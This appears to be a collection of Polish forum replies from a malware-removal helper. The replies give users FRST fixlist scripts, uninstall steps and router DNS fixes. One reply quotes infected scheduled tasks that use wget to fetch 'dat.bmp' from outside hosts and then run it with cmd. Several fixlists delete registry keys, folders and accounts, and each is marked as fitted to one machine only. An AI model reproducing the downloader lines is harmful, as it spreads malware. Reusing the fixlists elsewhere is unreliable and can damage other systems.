picasso

Prawie wszystko pomyślnie odinstalowane, ostał się jednak aktywny sterownik Baidu. Doczyszczanie po deinstalacjach: 1. Kolejne deinstalacje: - Odinstaluj jeszcze te starocie: K-Lite Codec Pack 6.2.0 (Basic), LAME v3.99.3 (for Windows), Windows Media Player Firefox Plugin, Xvid Video Codec. Jeśli coś będzie później potrzebne, to ewentualnie doinstalujemy nowe wersje. - Uruchom Program Install and Uninstall Troubleshooter i za jego pomocą usuń ukryty odpadek po Adobe Shockwave swMSM. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: R0 Bhbase; C:\Windows\System32\drivers\Bhbase.sys [46440 2015-03-31] (Baidu, Inc.) U5 AppMgmt; C:\Windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 AdobeUpdateService; C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [X] S2 BASSVC; "C:\Program Files\Baidu Security\MoboMarket\1.2.8.4379\bassvc.exe" -svc [X] S3 BprotectEx; \??\C:\Windows\System32\drivers\BprotectEx.sys [X] S3 PCFApiUtil; \??\C:\Program Files\PC Faster\5.1.0.0\PCFApiUtil.sys [X] Task: {0E9F1DD4-4F87-4A26-BA7B-9623333CCA2B} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\SymErr.exe Task: {13B8C185-BEEC-4E21-94C6-27B02F42D1A5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {251513BC-20DE-4CEB-A01B-F251D4928651} - System32\Tasks\{2FE4EAE7-B719-4DBC-9AD1-47EBD5FAEF8B} => Chrome.exe hxxp://ui.skype.com/ui/0/6.16.0.105/pl/abandoninstall?page=tsProgressBar Task: {25311AD4-9B42-44C7-9FB8-90BE07111418} - System32\Tasks\{485030A6-13D3-4BAB-BB08-56748BC146E5} => pcalua.exe -a "C:\Program Files\Real\RealPlayer\Update\r1puninst.exe" -c RealNetworks|RealPlayer|15.0 Task: {2A7BE995-3CB8-4CAC-BD35-122E9D077802} - System32\Tasks\{27869052-90F0-4837-BA38-6AFE9830166B} => pcalua.exe -a C:\Users\User\Downloads\podanie.exe -d C:\Users\User\Downloads Task: {3C7956F2-28CC-40A7-9452-8D6481806BBD} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Duplicaterecord.js" Task: {4A0CD994-8408-4A16-88C6-F337583268A4} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\SymErr.exe Task: {52D05AFA-BB7C-4513-BC08-AB7F2F7ACCD1} - System32\Tasks\{3AD1090E-8F7E-4519-BFC3-0355FEACFD01} => Chrome.exe hxxp://ui.skype.com/ui/0/6.16.0.105/pl/abandoninstall?page=tsProgressBar Task: {53D5E446-7AA3-4261-9BD9-3A3DF43C0908} - System32\Tasks\{BE95B6E7-88F3-43CE-B5F2-0FA8DDA46A0E} => pcalua.exe -a D:\GRY\HP2\HP2.exe -d D:\GRY\HP2 Task: {B4A20ABC-E0C7-4170-B8A3-53310DF82919} - System32\Tasks\{561301EB-306C-476D-BB00-F205F5119DBC} => pcalua.exe -a F:\SimsPS_inst.exe -d F:\ Task: {D852C01B-1944-4AE0-82EB-8F79297C7E25} - System32\Tasks\{F737C845-BFFD-42B5-AADE-3E56D788FE78} => Chrome.exe hxxp://ui.skype.com/ui/0/6.22.81.104/pl/abandoninstall?source=lightinstaller&page=tsMain Task: {E6C1CFE2-4746-4E28-A58F-397995476F12} - System32\Tasks\{9F93EB9D-6D4C-4D7F-ADF3-BFF4BEA7756B} => pcalua.exe -a "C:\Program Files\Deluxe Ski Jump 4\Setup.exe" -d "C:\Program Files\Deluxe Ski Jump 4" Task: {F0EF25E8-338F-481C-AC23-C24552FDAD72} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\WSCStub.exe Task: {F842110C-FCA0-429F-BCD7-34E007A18753} - System32\Tasks\{3B0AED1C-E912-4D4A-BC5D-7309489BBC11} => pcalua.exe -a D:\download\Last.fm-1.5.4.27091.exe -d D:\download Task: {FFAF5642-0684-4A67-B080-C2BBFCCB8E20} - System32\Tasks\{FA920636-A0FC-4C54-A287-8CBAF5695453} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2 University\Sims2EP1_loader.exe" -d "C:\Program Files\EA GAMES\The Sims 2 University" HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM\...\Run: [Adobe Creative Cloud] => "C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true HKLM\...\Run: [DLLSuite2016] => C:\Program Files\DLL Suite\DLLSuite.exe HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [Xvid] => C:\Program Files\Xvid\CheckUpdate.exe [8192 2011-01-17] () HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [EA Core] => "C:\Program Files\Electronic Arts\EADM\Core.exe" -silent HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [uTorrent] => "D:\cx7 trial\utorrent\uTorrent.exe" /MINIMIZED CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1894515312-3285578680-510463183-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1894515312-3285578680-510463183-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-1894515312-3285578680-510463183-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.wp.pl/?dp=20160817 BHO: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll => Brak pliku DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [brak pliku] FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [brak pliku] FF Plugin HKU\S-1-5-21-1894515312-3285578680-510463183-1000: @unity3d.com/UnityPlayer,version=1.0 -> Unity\WebPlayer\loader\npUnity3D32.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main C:\Program Files\GUT6E29.tmp C:\Program Files\Baidu Security C:\Program Files\GUM898A.tmp C:\Program Files\GUMB99E.tmp C:\Program Files\Java C:\Program Files\McAfee C:\Program Files\Real C:\Program Files\QuickTime C:\Program Files\Common Files\McAfee C:\ProgramData\Duplicaterecord.js C:\ProgramData\Baidu C:\ProgramData\Baidu Security C:\ProgramData\McAfee C:\ProgramData\Temp C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hao123桌面版 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp3 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader C:\Users\User\AppData\Local\Adobe * C:\Users\User\AppData\Roaming\Preferencje * C:\Users\User\AppData\Roaming\Baidu C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\360安全浏览器 C:\Users\User\Documents\Corel\Próbki Corel PHOTO-PAINT X6\target.lnk C:\Users\User\Favorites\常用 C:\Users\User\Favorites\GG dysk.lnk C:\Users\User\Favorites\Links\1şĹµę-ÍřÉĎł¬ĘĐ1şĹµęŁ¬ĘˇÁ¦ĘˇÇ®ĘˇĘ±Ľä.url C:\Users\User\Favorites\Links\´óÖÚµăĆŔÍřÍĹąş.url C:\Users\User\Favorites\Links\ËŐÄţŇ׹ş,ËŐÄţŇ׹şÍřÉĎÉĚłÇ.url C:\Users\User\Favorites\Links\ĚÔ±¦ÍřĚŘÂôƵµŔ - ĂżČյͼŰÉĚĆ·ÇŔąşÖĐŁˇ.url C:\Users\User\Favorites\Links\ľ©¶«ÍřÉĎÉĚłÇ-×ŰşĎÍřąşĘ×ѡ.url C:\Users\User\Favorites\Links\ŃÇÂíŃ·-ÍřÉĎąşÎďÉĚłÇ.url C:\Users\Public\Documents\Baidu C:\Users\Public\Documents\Baidu Security C:\Users\wangzhisong C:\Windows\system32\Adobe C:\Windows\system32\Drivers\Bhbase.sys C:\Windows\system32\Tasks\AVAST Software C:\Windows\system32\Tasks\Norton Internet Security EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść w folderze z którego uruchamiasz FRST. Przejdź w tryb awaryjny Windows. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu, opuść tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym Addition ale bez Shortcut. Dołącz też plik fixlog.txt. Wyliczone przez Ciebie strony, na których nie ma problemu, domyślnie ładują odtwarzacz HTML5 a nie Flash. W kwestii reszty (o ile na polskich stronach chodzi o Flash, bo niekoniecznie materiały mogą być w tym formacie), to sprawdź czy coś pomoże ustawienie tej opcji w Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > Ustawienia treści > Wtyczki > Uruchom całą treść wtyczki. Po rekonfiguracji przeładuj Chrome.

Fix FRST nie miał być powtarzany, to jest skrypt jednorazowego użytku i przestaje być aktualny po użyciu (nie przetworzy ponownie tego co już usunął). Natomiast akcja z routerem poprawnie wykonana, w świeżym logu FRST widać, że DhcpNameServer zostało pomyślnie zaktualizowane z routera. Wszystko zrobione, kończymy: Zastosuj DelFix, wyczyść foldery Przywracania systemu, dodatkowo zaktualizuj programy Adobe AIR + Adobe Flash Player 22 NPAPI. Wszystko tu: KLIK.

Fix FRST pomyślnie wykonany. Wykryte zostały sterowniki (*}Gw64.sys od SourceApp. Ich rzeczywiście nie ma w systemie, w raporcie FRST zero śladu po nich. Proces svchost.exe to host dla wielu usług, występuje wielokrotnie zgodnie z podziałem usług na grupy. Zdefiniuj o którym svchost tu mowa. Prawoklik na proces > Przejdź do usług > wypisz podświetlone. Jeśli będzie wśród usług Windows Update, to jest przypuszczalny delikwent. Mashed jest także na liście zainstalowanych programów. Skoro gra nie działa, odinstaluj ją. Następnie zrób nowy log FRST Addition.txt (główny log zbędny). Jeśli on wykaże że zadania się nie usunęły samodzielnie, dokończę je skryptem FRST.

DHCP > DHCP Settings > skonfiguruj Primary i Secondary DNS: Dodatkowo trzeba też zamknąć zdalny dostęp: Security > Remote Management > pola Remote Management IP Address ustaw na 0.0.0.0

Działania końcowe: 1. W Dzienniku zdarzeń drobny błąd WMI. Skoryguj na podstawie wytycznych Microsoftu: KLIK. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj Internet Explorer do wersji IE11. Obecnie stoi stara niewspierana wersja IE8. To wszystko.

Skutki w logu: Tcpip\Parameters: [DhcpNameServer] 5.39.220.125 8.8.8.8 Tcpip\..\Interfaces\{f6207f7f-9703-4893-9945-d3a972c6df22}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{f6207f7f-9703-4893-9945-d3a972c6df22}: [DhcpNameServer] 5.39.220.125 8.8.8.8 To nie są te serwery DNS o które tu chodziło, dlatego nie podawałam tych instrukcji. Zedytowałeś serwery DNS Windows (NameServer) a nie routera (DhcpNameServer). Owszem, one "przebijają" te z routera, co nie zmienia faktu, że router jest nadal zainfekowany i cokolwiek wepniesz w sieć pod jego kontrolą (np. laptop, telefon, etc.) zostanie natychmiast zainfekowane. Bezpośrednia edycja rejestru tu odpada, DhcpNameServer jest aktualizowane z routera i wartość nie utrzyma się. Podaj z jakim modelem routera mamy do czynienia.

Skoryguję co zostało tu powiedziane. Infekcja tu była, załączono ją w skrypcie "kosmetycznym": Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp Ale to nie ZeroAccess, który jest martwy od lat. - Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"? - Na czym polega niemożność deinstalacji programu "Apple Software Update"? - Tak, w komputerze jest kilku użytkowników i jest to normalny układ. Wszystkie konta z wyjątkiem osobiście przez Ciebie założonego (Dawid) oraz wprowadzonego przez instalację .NET Framework 1.1 (ASPNET) są wbudowane w każdy system XP. To od .NET można usunąć, jest zbędne. ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-839522115-1303643608-1417001333-500 - Administrator - Enabled) ASPNET (S-1-5-21-839522115-1303643608-1417001333-1004 - Limited - Enabled) Dawid (S-1-5-21-839522115-1303643608-1417001333-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Dawid Gość (S-1-5-21-839522115-1303643608-1417001333-501 - Limited - Disabled) Pomocnik (S-1-5-21-839522115-1303643608-1417001333-1000 - Limited - Enabled) SUPPORT_388945a0 (S-1-5-21-839522115-1303643608-1417001333-1002 - Limited - Disabled) - A foldery "crypto" są poprawne i nie próbuj ich usuwać, bo uszkodzisz system certyfikatów systemu: C:\Documents and Settings\[Folder konta]\Dane aplikacji\Microsoft\Crypto Tak, bo jessika przetworzyła w skrypcie sterownik G Data filtrujący klawiaturę, ale nie zdejmując filtra z klawiatury (to należało zrobić przed próbą usuwania sterownika). KBFlt = Keyboard Filter: R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG) Otwórz Notatnik i wklej w nim: Reg: reg add HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318} /v UpperFilters /t REG_MULTI_SZ /d kbdclass /f CMD: net user ASPNET /delete S3 IDriverT; "C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe" [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKLM -> DefaultScope - brak wartości FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: (Microsoft .NET Framework Assistant) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2011-06-28] [Brak podpisu cyfrowego] Reboot: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw plik. A klawiatura powinna zacząć działać.

Jest multum sposobów wykorzystywanych przez infekcje, np. ograniczenia IPSec, modyfikacja pliku Hosts, proxy, instrukcje wbudowane w określony proces lub moduł (może być uruchomiony na multum sposobów).

AdwCleaner wykrył sporo szczątków adware w rejestrze. Skasuj wszystko za pomocą AdwCleaner. UCGuard usunięty, więc program powinien wykonać zadanie. Na wszelki wypadek sprawdź też czy Hitman nadal coś widzi.

Zadałam tryb awaryjny (a nie awaryjny z obsługą sieci) właśnie ze względu na sterownik UCGuard od niepożądanej instalacji UCBrowser. To on blokował procesy usuwania. Skrypt FRST pomyślnie wykonany. Poprawki: 1. Nowy profil Google Chrome założony, a już zanieczyszczony przez niepożądane przekierowania Wize Search. Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Wize. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > ustaw Google jako domyślną, po tym skasuj z listy powiązaną wyszukiwarkę Wize. 2. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\TDSSKiller_Quarantine RemoveDirectory: C:\Users\Przemek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData RemoveDirectory: C:\Users\Przemek\AppData\Local\Google\Chrome\User Data\Default Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu. Przedstaw wynikowy fixlog.txt. 3. Uruchom AdwCleaner ponownie i sprawdź czy coś jeszcze wykrywa.

Problemem jest infekcja routera, zamalowany adres IP jest holenderski: Tcpip\Parameters: [DhcpNameServer] 5.39.220.125 8.8.8.8 Działania do przeprowadzenia: 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony dodatkowe działania poboczne: 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CMD: ipconfig /flushdns Task: {161E0C07-2573-4EE5-9190-380AED446106} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {18C7A009-1FAD-4328-A534-C5D3FDFE9EDC} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {32C9A5D6-9044-4883-AC00-92B87D06264E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\Windows\System32\AutoWorkplace.exe Task: {36C47DF0-A8A3-4ED8-AA10-F6B5FE9168AF} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {588E231A-AF8B-4DFE-AFEC-86DA6CEDA7EF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {64B17A55-0C02-4115-A328-9F538AB20D81} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {68D6C696-E44A-425F-B26A-DA452F95789D} - \WPD\SqmUpload_S-1-5-21-1941264818-4225413360-4045777747-1001 -> Brak pliku Task: {762BCE78-A565-4405-A04C-2143B730894F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {79BFA46C-16C8-459B-8579-7774D3205E76} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku Task: {887F04EA-EB16-4D21-A5B8-669BF7FFB30A} - System32\Tasks\{B454B5BC-3903-462B-9A58-1148F1F4BDE5} => pcalua.exe -a "C:\Program Files\AutoCAD 2009\acad.exe" -d "C:\Users\Adam\Desktop\DWG\Nowy folder" -c "C:\Users\Adam\Desktop\DWG\Nowy folder\Teren hali.dwg" Task: {9750A906-F754-4F2F-8750-B4433F6A8BC9} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {D01E78BC-9F19-4186-9693-25F9856CD511} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {EA73656B-1334-47F6-B033-984DABAAD21B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {F966FAAA-CA74-4048-8DF3-89E24B9AF41C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => Brak pliku ShellIconOverlayIdentifiers: [uchwyt nakładania ikony podpisu cyfrowego] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => Brak pliku HKU\S-1-5-21-1941264818-4225413360-4045777747-1001\...\Policies\Explorer: [] HKU\S-1-5-21-1941264818-4225413360-4045777747-1001\...\Run: [CCleaner Monitoring] => "C:\Windows.old\Program Files\CCleaner\CCleaner64.exe" /MONITOR HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Raptr /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v Raptr /f C:\Users\Adam\AppData\Roaming\Autodesk\AutoCAD 2015\R20.0\plk\Plotters\Dodaj ploter.lnk C:\Users\Adam\AppData\Roaming\Autodesk\AutoCAD 2015\R20.0\plk\Plotters\Plot Styles\Dodaj tabelę stylów wydruku.lnk C:\Users\Adam\Desktop\Programy\CCleaner.lnk C:\Users\Adam\Desktop\Programy\Registry Life.lnk RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zresetuj cache wtyczek Google Chrome, by usunąć puste wpisy: W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Czy na pewno uruchomiłeś program w trybie awaryjnym Windows?

Główny komunikat i kod błędu są zbyt ogólne, dlatego zostały podane detale debugowania.

Nadal jest co czyścić, m.in. aktywne sterowniki adware, zainfekowane Google Chrome oraz wszystkie skróty przeglądarek. Przy okazji będę też usuwać odpadki po odinstalowanych programach. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: S2 Citdhwa; "C:\Users\Przemek\AppData\Roaming\AzigcWig\Geeswu.exe" -cms [X] S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [X] S2 Kuaizip Update Checker; C:\Program Files (x86)\KuaiZip\X86\kuaizipUpdateChecker.dll [X] S2 KuaizipUpdateChecker; C:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll [X] S1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2016-09-15] (REALiX(tm)) S2 KuaiZipDrive; C:\Windows\system32\drivers\KuaiZipDrive.sys [92872 2016-09-17] (WinMount International Inc) S2 KuaiZipDrive2; C:\Windows\system32\drivers\KuaiZipDrive2.sys [93072 2016-09-17] (WinMount International Inc) R1 UCGuard; C:\Windows\System32\DRIVERS\ucguard.sys [81792 2016-08-29] (Huorong Borui (Beijing) Technology Co., Ltd.) S2 ComputerZLock; \??\C:\Program Files (x86)\LuDaShi\ComputerZLock_x64.sys [X] S3 ComputerZ_x64; \??\C:\Program Files (x86)\LuDaShi\ComputerZ_x64.sys [X] NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ==> No File Task: {0AF14ECA-B2B9-48B5-A34E-89D8306FE486} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: {A76297F3-3BBC-4275-84B0-6D9234D1A7E4} - System32\Tasks\Microsoft\Windows\Multimedia\Manager => C:\Users\Przemek\AppData\Roaming\Adobe\Manager.exe Task: {B04AFB75-99CB-4F38-A91A-E99E2D52BC56} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: {DA8D609C-E26D-48D0-AC5A-7BA3F5FBC530} - System32\Tasks\ComputerZ-Tray => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe Task: {DEFAEC10-5A75-418F-8063-D04C84888430} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\F85A~1\X86\Update.exe Task: {F37800E9-3BA8-4E7E-B6AD-98ABD7A0E413} - System32\Tasks\Microsoft\Windows\Multimedia\ReportSender => C:\Users\Przemek\ReportSender\ReportSender.exe Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe HKLM-x32\...\Run: [win_en_77] => "C:\Program Files (x86)\win_en_77\win_en_77.exe" HKLM-x32\...\Run: [app] => C:\Program Files (x86)\sbqh\uc.exe HKLM\...\RunOnce: [GrpConv] => grpconv -o HKLM-x32\...\RunOnce: [{AA6E0D33-1840-4D0A-98EA-E7B4E82016DC}] => cmd.exe /C start /D "C:\Users\Przemek\AppData\Local\Temp\{AA6E0D33-1840-4D0A-98EA-E7B4E82016DC}" /B {9B3387C1-398F-42AD-A67A-85C6283565EB}.exe -accepteula -accepteulaksn -postboot HKU\S-1-5-21-1027309677-2631733394-661215758-1000\...\Run: [installer] => C:\Users\Przemek\AppData\Local\Temp\is-64H6C.tmp\51490.exe /autorun ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\¿ìѹ\X64\KZipShell.dll No File ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll No File SearchScopes: HKU\S-1-5-21-1027309677-2631733394-661215758-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Toolbar: HKU\S-1-5-21-1027309677-2631733394-661215758-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File GroupPolicy: Restriction - Chrome GroupPolicyScripts: Restriction GroupPolicyScripts-x32: Restriction CHR HKLM\SOFTWARE\Policies\Google: Restriction ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Przemek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://navsmart.info ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info ShortcutWithArgument: C:\Users\Przemek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> 